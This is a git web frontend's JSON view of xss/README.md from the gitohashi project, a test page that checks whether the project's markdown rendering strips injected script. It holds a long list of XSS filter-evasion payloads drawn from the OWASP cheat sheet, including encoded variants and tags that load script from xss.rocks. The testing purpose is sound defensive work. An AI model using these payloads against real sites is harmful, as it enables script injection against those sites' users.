Warmcat homepage andy@warmcat.com
libwebsockets
{"schema":"libjg2-1", "vpath":"/git/", "avatar":"/git/avatar/", "alang":"", "gen_ut":1713976633, "reponame":"gitohashi", "desc":"Git web frontend with clientside rendering", "owner": { "name": "Andy Green", "email": "andy@warmcat.com", "md5": "c50933ca2aa61e0fe2c43d46bb6b59cb" },"url":"https://warmcat.com/repo/gitohashi", "f":3, "items": [ { "schema":"libjg2-1", "oid":{ "oid": "9961e6fef5f0f2458efc1c2a40d63f7cc50ebfce", "alias": [ "refs/heads/main","refs/heads/master"]},"tree": [ { "name": "README.md","mode": "33188", "size":8086}, { "name": "xss.c","mode": "33188", "size":7179}],"s":{"c":1713569570,"u": 315}} ,{"schema":"libjg2-1", "cid":"8c08ac510382a1f7dc9cc121fdb3d950", "oid":{ "oid": "9961e6fef5f0f2458efc1c2a40d63f7cc50ebfce", "alias": [ "refs/heads/main","refs/heads/master"]},"blobname": "xss/README.md", "blob": "## XSS testing\n\nThe pages in this dir try to smuggle script execution into the stuff\nrendered in your browser in various ways.\n\nUnfortunately there are a LOT of ways modern browsers will let you do\nthat. Here we try a bunch of them and see if we are successful in\ndefeating them with our preprocessing. The attack methods came from\n\nhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet\n\nThis page is checking showdown rendering.\n\nAny successful script executions pop up an alert box. Seeing some strange\nrenderings just talking about scripts on this page and no popups counts as\na success...\n\n\u003cscript\u003ealert(\u0022xss/README.md: trivial script\u0022);\u003c/script\u003e\nhttps://something.com\nhttps://something.com' onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)'\nhttps://something.com\u0022 onmouseover\u003d\u0022alert('xss/README.md: onmouseover in anonymous link')\u0022\nhttps://something.com#' onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)'\nhttps://something.com#\u0022 onmouseover\u003d\u0022alert('xss/README.md: onmouseover in anonymous link')\u0022\nhttps://something.com?x\u003d' onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)'\nhttps://something.com?x\u003d\u0022 onmouseover\u003d\u0022alert('xss/README.md: onmouseover in anonymous link')\u0022\nhttps://something.com\u0026quot; onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)\u0026quot;\nhttps://something.com\u0026#34 onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)\u0026quot;\nhttps://something.com\u0026amp;#34 onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)\u0026quot;\n\n\n\nx \u003ca name\u003d\u0022n\u0022\nhref\u003d\u0022javascript:alert('xss/README.md: js in a href')\u0022\u003eclick me\u003c/a\u003e\n\n## \u003cscript\u003ealert(\u0022xss/README.md: trivial script in header\u0022);\u003c/script\u003e\n## javascript:alert('xss/README.md: js: in header')\n\njavascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d'+/\u0022/+/onmouseover\u003d1/+/[*/[]/+alert(1)//'\u003e\n\u003cIMG SRC\u003d\u0022javascript:alert('XSS');\u0022\u003e\n\u003cIMG SRC\u003djavascript:alert('XSS')\u003e\n\u003cIMG SRC\u003dJaVaScRiPt:alert('XSS')\u003e\n\u003cIMG SRC\u003djavascript:alert(\u0026quot;XSS\u0026quot;)\u003e\n\u003cIMG SRC\u003d`javascript:alert(\u0022RSnake says, 'XSS'\u0022)`\u003e\n\u003cIMG \u0022\u0022\u0022\u003e\u003cSCRIPT\u003ealert(\u0022XSS\u0022)\u003c/SCRIPT\u003e\u0022\u003e\n\u003cIMG SRC\u003djavascript:alert(String.fromCharCode(88,83,83))\u003e\n\u003cIMG SRC\u003d# onmouseover\u003d\u0022alert('xxs')\u0022\u003e\n\u003cIMG SRC\u003d onmouseover\u003d\u0022alert('xxs')\u0022\u003e\n\u003cIMG onmouseover\u003d\u0022alert('xxs')\u0022\u003e\n\u003cIMG SRC\u003d/ onerror\u003d\u0022alert(String.fromCharCode(88,83,83))\u0022\u003e\u003c/img\u003e\n\u003cimg src\u003dx onerror\u003d\u0022\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u0022\u003e\n\u003cIMG SRC\u003d\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;\u0026#97;\u0026#108;\u0026#101;\u0026#114;\u0026#116;\u0026#40;\n\u0026#39;\u0026#88;\u0026#83;\u0026#83;\u0026#39;\u0026#41;\u003e\n\u003cIMG SRC\u003d\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026\n#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u003e\n\u003cIMG SRC\u003d\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u003e\n\u003cIMG SRC\u003d\u0022jav\tascript:alert('XSS');\u0022\u003e\n\u003cIMG SRC\u003d\u0022jav\u0026#x09;ascript:alert('XSS');\u0022\u003e\n\u003cIMG SRC\u003d\u0022jav\u0026#x0A;ascript:alert('XSS');\u0022\u003e\n\u003cIMG SRC\u003d\u0022jav\u0026#x0D;ascript:alert('XSS');\u0022\u003e\n\u003cIMG SRC\u003d\u0022 \u0026#14; javascript:alert('XSS');\u0022\u003e\n\u003cSCRIPT/XSS SRC\u003d\u0022http://xss.rocks/xss.js\u0022\u003e\u003c/SCRIPT\u003e\n\u003cBODY onload!#$%\u0026()*~+-_.,:;?@[/|\u005c]^`\u003dalert(\u0022XSS\u0022)\u003e\n\u003cSCRIPT/SRC\u003d\u0022http://xss.rocks/xss.js\u0022\u003e\u003c/SCRIPT\u003e\n\u003c\u003cSCRIPT\u003ealert(\u0022XSS\u0022);//\u003c\u003c/SCRIPT\u003e\n\u003cSCRIPT SRC\u003dhttp://xss.rocks/xss.js?\u003c B \u003e\n\u003cSCRIPT SRC\u003d//xss.rocks/.j\u003e\n\u003cIMG SRC\u003d\u0022javascript:alert('XSS')\u0022\n\u003ciframe src\u003dhttp://xss.rocks/scriptlet.html \u003c\n\u005c\u0022;alert('XSS');//\n\u003c/script\u003e\u003cscript\u003ealert('XSS');\u003c/script\u003e\n\u003cINPUT TYPE\u003d\u0022IMAGE\u0022 SRC\u003d\u0022javascript:alert('XSS');\u0022\u003e\n\u003cBODY BACKGROUND\u003d\u0022javascript:alert('XSS')\u0022\u003e\n\u003cIMG DYNSRC\u003d\u0022javascript:alert('XSS')\u0022\u003e\n\u003cIMG LOWSRC\u003d\u0022javascript:alert('XSS')\u0022\u003e\n\u003cSTYLE\u003eli {list-style-image: url(\u0022javascript:alert('XSS')\u0022);}\u003c/STYLE\u003e\u003cUL\u003e\u003cLI\u003eXSS\u003c/br\u003e\n\u003cIMG SRC\u003d'vbscript:msgbox(\u0022XSS\u0022)'\u003e\n\u003csvg/onload\u003dalert('XSS')\u003e\nSet.constructor`alert\u005cx28document.domain\u005cx29```\n\n\u003cBODY ONLOAD\u003dalert('XSS')\u003e\n\n\u003cBGSOUND SRC\u003d\u0022javascript:alert('XSS');\u0022\u003e\n\u003cBR SIZE\u003d\u0022\u0026{alert('XSS')}\u0022\u003e\n\u003cLINK REL\u003d\u0022stylesheet\u0022 HREF\u003d\u0022javascript:alert('XSS');\u0022\u003e\n\u003cIMG STYLE\u003d\u0022xss:expr/*XSS*/ession(alert('XSS'))\u0022\u003e\n\u003cXSS STYLE\u003d\u0022xss:expression(alert('XSS'))\u0022\u003e\n\n¼script¾alert(¢XSS¢)¼/script¾\n\n\u003cMETA HTTP-EQUIV\u003d\u0022refresh\u0022 CONTENT\u003d\u00220;url\u003djavascript:alert('XSS');\u0022\u003e\n\n\u003cMETA HTTP-EQUIV\u003d\u0022refresh\u0022 CONTENT\u003d\u00220;url\u003ddata:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\u0022\u003e\n\u003c!--[if gte IE 4]\u003e\n \u003cSCRIPT\u003ealert('XSS');\u003c/SCRIPT\u003e\n \u003c![endif]--\u003e\n\n \u003cOBJECT TYPE\u003d\u0022text/x-scriptlet\u0022 DATA\u003d\u0022http://xss.rocks/scriptlet.html\u0022\u003e\u003c/OBJECT\u003e\n\n\u003cEMBED SRC\u003d\u0022data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg\u003d\u003d\u0022 type\u003d\u0022image/svg+xml\u0022 AllowScriptAccess\u003d\u0022always\u0022\u003e\u003c/EMBED\u003e\n\n\n\u003cHTML\u003e\u003cBODY\u003e\n\u003c?xml:namespace prefix\u003d\u0022t\u0022 ns\u003d\u0022urn:schemas-microsoft-com:time\u0022\u003e\n\u003c?import namespace\u003d\u0022t\u0022 implementation\u003d\u0022#default#time2\u0022\u003e\n\u003ct:set attributeName\u003d\u0022innerHTML\u0022 to\u003d\u0022XSS\u003cSCRIPT DEFER\u003ealert(\u0022XSS\u0022)\u003c/SCRIPT\u003e\u0022\u003e\n\u003c/BODY\u003e\u003c/HTML\u003e\n\n \u003cHEAD\u003e\u003cMETA HTTP-EQUIV\u003d\u0022CONTENT-TYPE\u0022 CONTENT\u003d\u0022text/html; charset\u003dUTF-7\u0022\u003e \u003c/HEAD\u003e+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n\n\u003cSCRIPT a\u003d\u0022\u003e\u0022 SRC\u003d\u0022httx://xss.rocks/xss.js\u0022\u003e\u003c/SCRIPT\u003e\n\u003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n%3Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026ltscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026lt;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026LTscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026LT;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#60script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#060script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#0060script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#00060script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#000060script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#0000060script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#60;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#060;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#0060;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#00060;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#000060;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#0000060;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x3cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x03cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x0003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x00003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x000003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x3c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x03c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x0003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x00003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x000003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X3cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X03cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X0003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X00003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X000003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X3c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X03c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X0003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X00003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X000003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x3Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x03Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x0003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x00003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x000003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x3C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x03C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x0003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x00003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x000003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X3Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X03Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X0003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X00003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X000003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X3C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X03C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X0003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X00003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X000003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u005cx3cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u005cx3Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u005cu003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u005cu003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\n","s":{"c":1713569570,"u": 223}} ],"g": 8791,"chitpc": 0,"ehitpc": 0,"indexed":0 , "ab": 0, "si": 0, "db":0, "di":0, "sat":0, "lfc": "7d0a"}